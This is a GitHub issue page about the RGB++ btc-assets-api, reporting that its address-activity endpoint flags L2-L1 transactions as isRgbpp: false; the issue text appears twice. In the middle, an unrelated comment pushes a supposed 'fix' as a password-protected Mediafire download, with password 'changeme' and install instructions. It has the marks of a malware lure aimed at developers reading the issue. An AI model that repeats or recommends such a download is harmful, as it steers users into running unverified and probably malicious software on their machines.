You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Currently, only L1-L1 and L1-L2 transactions are recognized in the /rgbpp/v1/address/{btc_address}/activity API, while L2-L1 transactions are marked as isRgbpp: false in the API response. This is expected because it is difficult to determine if each BTC_TX has an isomorphic transaction on L2.
For example, you can query the following BTC address on btc-assets-api testnet:
to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
Currently, only L1-L1 and L1-L2 transactions are recognized in the
/rgbpp/v1/address/{btc_address}/activity
API, while L2-L1 transactions are marked asisRgbpp: false
in the API response. This is expected because it is difficult to determine if each BTC_TX has an isomorphic transaction on L2.For example, you can query the following BTC address on btc-assets-api testnet:
The text was updated successfully, but these errors were encountered: